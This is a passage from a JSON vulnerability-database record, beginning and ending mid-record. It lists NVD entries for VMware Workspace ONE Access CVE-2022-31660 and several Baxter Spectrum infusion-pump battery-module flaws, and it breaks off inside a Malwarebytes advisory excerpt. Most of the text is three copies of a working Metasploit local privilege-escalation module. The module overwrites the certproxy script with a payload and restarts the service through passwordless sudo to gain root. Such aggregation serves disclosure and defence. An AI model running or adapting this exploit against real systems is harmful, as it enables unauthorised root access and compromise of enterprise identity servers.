"cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM does not perform mutual authentication with the gateway server host. This may allow an attacker to perform a man in the middle attack that modifies parameters making the network connection fail.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26394", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.8, "vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26394"], "modified": "2022-09-16T16:47:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26394", "cvss": {"score": 4.8, "vector": "AV:A/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:40:27", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contains a privilege escalation vulnerability. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31660", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-11T16:10:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:one_access:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:identity_manager:3.3.4"], "id": "CVE-2022-31660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31660", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:14", "description": "The Baxter Spectrum Wireless Battery Module (WBM) stores network credentials and PHI (only applicable to Spectrum IQ pumps using auto programming) in unencrypted form. An attacker with physical access to a device that hasn't had all data and settings erased may be able to extract sensitive information.", "cvss3": {"exploitabilityScore": 0.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.2, "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26390", "cwe": ["CWE-311"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26390"], "modified": "2022-09-15T16:46:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:22d28", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26390", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:22d28:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM (v16, v16D38) and Baxter Spectrum WBM (v17, v17D19, v20D29 to v20D32) when in superuser mode is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26392", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26392"], "modified": "2022-09-15T16:45:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17d19", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d32", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16d38", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:17", "cpe:/o:baxter:spectrum_wireless_battery_module_firmware:16"], "id": "CVE-2022-26392", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26392", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16d38:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d32:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:16:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:17d19:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:40:13", "description": "The Baxter Spectrum WBM is susceptible to format string attacks via application messaging. An attacker could use this to read memory in the WBM to access sensitive information or cause a Denial of Service (DoS) on the WBM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-09T15:15:00", "type": "cve", "title": "CVE-2022-26393", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26393"], "modified": "2022-09-15T15:50:00", "cpe": ["cpe:/o:baxter:spectrum_wireless_battery_module_firmware:20d29", "cpe:/o:baxter:baxter_spectrum_iq_35700bax3_firmware:-", "cpe:/o:baxter:sigma_spectrum_35700bax_firmware:-", "cpe:/o:baxter:sigma_spectrum_35700bax2_firmware:-"], "id": "CVE-2022-26393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26393", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:baxter:spectrum_wireless_battery_module_firmware:20d29:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:baxter_spectrum_iq_35700bax3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:baxter:sigma_spectrum_35700bax2_firmware:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2023-06-03T15:00:33", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T00:00:00", "type": "zdt", "title": "VMware Workspace ONE Access Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-05T00:00:00", "id": "1337DAY-ID-37891", "href": "https://0day.today/exploit/description/37891", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://0day.today/exploit/37891", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:25", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T16:13:28", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-31660", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31660"], "modified": "2023-04-04T09:24:09", "id": "MSF:EXPLOIT-LINUX-LOCAL-VMWARE_WORKSPACE_ONE_ACCESS_CERTPROXY_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-08-04T16:04:42", "description": "", "cvss3": {}, "published": "2022-08-04T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-04T00:00:00", "id": "PACKETSTORM:167973", "href": "https://packetstormsecurity.com/files/167973/VMware-Workspace-ONE-Access-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Unix \n \nTARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'VMware Workspace ONE Access CVE-2022-31660', \n'Description' => %q{ \nVMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges \nto those of the root user by modifying a file and then restarting the vmware-certproxy service which \ninvokes it. The service control is permitted via the sudo configuration without a password. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Spencer McIntyre' \n], \n'Platform' => [ 'linux', 'unix' ], \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Targets' => [ \n[ 'Automatic', {} ], \n], \n'DefaultOptions' => { \n'PrependFork' => true, \n'MeterpreterTryToFork' => true \n}, \n'Privileged' => true, \n'DefaultTarget' => 0, \n'References' => [ \n[ 'CVE', '2022-31660' ], \n[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] \n], \n'DisclosureDate' => '2022-08-02', \n'Notes' => { \n# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service \n# is disabled by default though. \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK] \n} \n} \n) \n) \nend \n \ndef certproxy_service \n# this script's location depends on the version, so find it. \nreturn @certproxy_service if @certproxy_service \n \n@certproxy_service = [ \n'/usr/local/horizon/scripts/certproxyService.sh', \n'/opt/vmware/certproxy/bin/certproxyService.sh' \n].find { |path| file?(path) } \n \nvprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service \n@certproxy_service \nend \n \ndef sudo(arguments) \ncmd_exec(\"sudo --non-interactive #{arguments}\") \nend \n \ndef check \nunless whoami == 'horizon' \nreturn CheckCode::Safe('Not running as the horizon user.') \nend \n \ntoken = Rex::Text.rand_text_alpha(10) \nunless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token) \nreturn CheckCode::Safe('Cannot invoke the service control script with sudo.') \nend \n \nunless writable?(TARGET_FILE) \nreturn CheckCode::Safe('Cannot write to the service file.') \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# backup the original permissions and contents \nprint_status('Backing up the original file...') \n@backup = { \nstat: stat(TARGET_FILE), \ncontents: read_file(TARGET_FILE) \n} \n \nif payload.arch.first == ARCH_CMD \npayload_data = \"#!/bin/bash\\n#{payload.encoded}\" \nelse \npayload_data = generate_payload_exe \nend \nupload_and_chmodx(TARGET_FILE, payload_data) \nprint_status('Triggering the payload...') \nsudo(\"--background #{certproxy_service} restart\") \nend \n \ndef cleanup \nreturn unless @backup \n \nprint_status('Restoring file contents...') \nfile_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it \nwrite_file(TARGET_FILE, @backup[:contents]) \nprint_status('Restoring file permissions...') \nchmod(TARGET_FILE, @backup[:stat].mode & 0o777) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167973/vmware_workspace_one_access_certproxy_lpe.rb.txt"}], "malwarebytes": [{"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, 